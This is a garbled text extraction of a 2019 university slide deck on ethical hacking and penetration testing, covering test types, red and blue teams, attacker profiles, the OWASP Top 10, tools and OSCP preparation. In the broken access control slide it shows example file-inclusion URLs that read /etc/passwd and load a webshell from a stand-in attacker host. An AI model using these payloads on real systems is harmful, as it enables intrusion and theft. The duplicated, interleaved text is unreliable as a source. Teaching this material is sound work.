ETHICAL HACKING AND PENTESTING

AGENDA
PENETRATION TESTING :DEFINITION & OBJECTIVES & TYPES 01
RED TEAM CYBER VS BLUE TEAM AND BAD PYRAMID 02
RESPONSIBILITIES OF CYBER SECURITY EXPERTS AND ATTACKER PROFILES 03
USE CASE : RED TEAM APT AND WEB PEN TESTING 04
SANS BLUE PRINT FOR PENETRATION TESTING 05
IT CERTIFICATION ROADMAP 06
 Penetration testing :DEFINITION & OBJECTIVES

An approach,
modeling tactics of
PEN real-world bad guys, to Finding security
VUL.
find vulnerabilities - vulnerabilities, which
TESTING then under controlled may or may not be ASSESSMENT
circumstances, exploit used to get in or
those vulnerabilities steal data.
and determine
business risk

Purpose
The ultimate goal is discovering flaws so that they can be remediated (applying patches, reconfiguring systems,
altering the architecture, changing processes, etc.).
 Types of Penetration Tests
NETWORK

06
WAR DIALING
One of the many avenues of entry/information gain is via remote
access through a dial-up connection to other phone controlled
systems (IVR, DISA etc) The attack method is known as War
SERVICES
finding target systems on a network
01
Dialing and is now being easier to perform due to the explosion
in VOIP services and providers
01

05 SOCIAL
ENGINEERING
Attempts to dupe a user into revealing
sensitive information or clicking on a malicious
06 02
CLIENT-SIDE 02
Designed to find exploit client-side software,
such as browsers, media players, doc editing
link in an email.
programs, etc.

05 03
04 WIRELESS
SECURITY
Targets the physical environment to find
unauthorized wireless access points or
04
WEB
APPLICATION 03
Targets web-based applications in the target
environment
insecure access points.
 RED TEAM CYBER VS BLUE TEAM

Offensive Security Defensive Security

Ethical Hacking Infrastructure Protection

Exploiting vulnerabilities Damage Control

Pen Testing IR: Incident Response

Black Box Testing Operational Security

Social Engineering Threat Hunters

Web App Scanning Digital Forensics

 Red team cyber VS Blue Team
Blue Team
• Identify the intrusions on
alert systems
• Identify the type of attacks
• Block the attacks before its
success
• Activate the hunting and
containment of the infected
PCs
• Identify and train the
physical teams for identify
spoof
• Enhance the access card
security

• Alert the teams for

reactive/prventive action
once detected

• Activate of runbooks for

• DNS tunneling incident response
RED Team • ICMP Tunneling

• Simulated cyber attacks • Simulated Physical

intrusion to sensitive
• Intrusion attemps areas
• Insider threat • Access card copy and
strengh test
• Remote attacks from
internet • Identity spoof
• VPN based attacks
RED TEAM CYBER VS BLUE TEAM: BAD PYRAMID
 ATTACKER PROFILES

State sponsored
- Cyberwar, state secret, industrial espionage
- Highly sophisticated
- Unlimited resources
- APT

Hacktivist
- Statement
- Relentless emotionally committed
- Vast networks
- Targeted attacks
Organized Crime
- Economic gain
- Significant technical resources
- Established syndicates
Recreational
- Fame and notoriety
- Limited technical resources
- Known Exploits
Criminal
- Vandalism
- Limited technical capabilities
USE CASE : RED TEAM APT ATTACK LIFECYCLE
 PEN TESTING METHODOLOGY
TESTING APPROACHES

 Manual Vulnerability Testing and Verification

 Firewall and ACL Testing
 Intrusion Detection/Prevention System Testing
 Password Strength Testing
 External Network Scan for Known Trojan/Hacker Ports
 Internal Network Scan for Known Trojan/Hacker Ports

 Social Engineering Attacks  User Rights Testing

 Physical Security  Network Equipment Security Controls Testing
 Manual Configuration Weakness Testing and  Database Security Controls Testing
Verification  Application Testing
OWASP TOP 10 vulnerabilities
owasp TOP 10 vulnerabilities

A1 Injection

Exploitability score: Easy

Detectability score: Easy
Technical Impact score: Severe
owasp TOP 10 vulnerabilities

A2 Broken Authentication

The risk of broken authentication is not restricted to a set attack

pattern or specific application vulnerability. An application becomes
vulnerable when adequate user authentication controls are
improperly implemented or overlooked altogether, increasing the
risk of user accounts being breached. OWASP outlines the three
primary attack patterns that exploit weak authentication:

1. credential stuffing
2. brute force access
3. session hijacking

Exploitability score: Easy

Detectability score: Average
Technical Impact score: Severe
owasp TOP 10 vulnerabilities

A3 Sensitive Data Exposure

“An attacker can simply monitor the network traffic, intercept

the TLS, and steals the user’s session cookie. The attacker
then replays this cookie and hijacks the user’s (authenticated)
session, accessing or modifying the user’s private data. This
attack can be modified in other ways such as changing the
recipient of a money transfer.” – OWASP
 owasp TOP 10 vulnerabilities

A4 XML External Entities (XXE)

An XML attack happens when an application that parsers XML

input is attacked. The attack can occur when XML input
contains a reference to an external entity and when the
reference is processed by a weakly configured XML parser.
Such an attack may lead to the disclosure of sensitive data,
DOS attack, server-side request forgery, and so on.
 owasp TOP 10 vulnerabilities
LFI:Usage
RFI:Usage Example
Example
A5 Broken Access Control
You
You create
create several
several modules
modules forfor
oneone page
page and
and to to include
include them
them you
you use
use thethe GET
GET parameter
parameter with
with thethe filename
filename of of
thethe
respective
respective
function, suchfunction,
as: such as:
Access control or authorization in web application means that
https://example.com/?module=contact.php
https://example.com/?module=contact.php
the app puts a limit on what content and functions should be
available to different users.

The
The Risks
Risks of of Introducing
Introducing a Local
a Local File
File Inclusion
Inclusion Vulnerability
Vulnerability
Broken access control is the problem that emerges when the
https://example.com/?module=/
application doesn’t have etc/passwd
a centralized access control thus
https://example.com/index.php?page=https://attacker.com/uploads/webshell.php
resulting in every complicated scheme that can lead to
developers making mistakes and leaving open vulnerabilities.

Examples:
File Path Traversal
Local File Inclusion LFI
Remote File Inclusion RFI
 TOOLS (1/2)

VMWARE WORKSTATION
Run multiple operating systems as virtual machines (including
WPSCAN Linux or Windows VMs) for development and testing

WPScan is a free, for non-commercial use, black box

WordPress vulnerability scanner written for security
professionals to test the security of sites. .
NETCAT
Netcat is a versatile networking tool that can
be used to interact with computers using UPD
or TCP connections

DROOPESCAN
FIREFOX INSPECTOR A plugin-based scanner that aids security
researchers in identifying issues with several
The inspector is used to review and modify the CMSs, mainly Drupal & Silverstripe
HTML and CSS of a web page.
 TOOLS (2/2)

EXPLOIT DB NMAP
Exploits, Shellcode, 0days, Remote Exploits, Nmap Free Security Scanner, Port Scanner, & Network Exploration
Local Exploits, Web Apps, Vulnerability Tool.
Reports, Security Articles, Tutorials , …..

.
SQLMAP
sqlmap is an open source penetration testing
tool that automates the process of detecting
and exploiting SQL injection flaws and taking
over of database servers

PYTHON
Python is an interpreted, high-level, general-
DIRBUSTER
purpose programming language. It provides DirBuster is a multi threaded java application
constructs that enable clear programming on designed to brute force directories and files
both small and large scales names on web/application servers.
CYBERSECURITY DAYS OF
GABES UNIVERSITY -2019
CYBERSECURITY DAYS OF
GABES UNIVERSITY -2019
CYBERSECURITY DAYS OF
GABES UNIVERSITY -2019
REPORTING
 IT Certification Roadmap

 Offensive Security Certified Professional (OSCP) is a certification

program that focuses on hands-on offensive information security

Course Pricing skills.

 It consists of two parts: a nearly 24-hour pen testing exam, and a

documentation report due 24 hours after it.
 You are required to take the Penetration Testing with Kali (PWK)
course
 PWK + 30 days Lab access + OSCP Exam Certification USD 800.00
1.Linux and Windows Environment - You need to be familiar with both. These will help you spot clues for privilege
escalation.
 PWK + 60 days Lab access + OSCP Exam
2.Linux and Certification
Windows Commands - KnowingUSDLinux 1000.00
and Windows commands helps a lot.
3.Basic Programming Skills - Expect to debug and rewrite exploits, so know Bash Scripting. This will help you to
 PWK + 90 days Lab access + automate
OSCP redundant tasks.
Exam Certification USD 1150.00
4.Web application attacks (SQLi, XSS, Local File Inclusion, Remote File Inclusion, and Command Execution
5.Metasploit Framework
 6.Nmap - Different scanning techniques and Nmap NSE
OSCP Certification Exam Retake USD 150.00
7.Netcat - You’ll be using these a lot during the OSCP.
8.Wireshark and tcpdump - Those are important because you’ll be using Wireshark to debug your exploit - or
tcpdump, when machines don’t have a GUI.
9.Windows and Linux Privilege Escalation - Aside from using kernel exploits, brush up on misconfigurations like
weak service/file permissions and NFS/Shares.
10.Escaping restricted shells and spawning shells - You’ll encounter these a lot during your OSCP.
11.File transfer - It is important that you know the different techniques to transfer files to a target machine.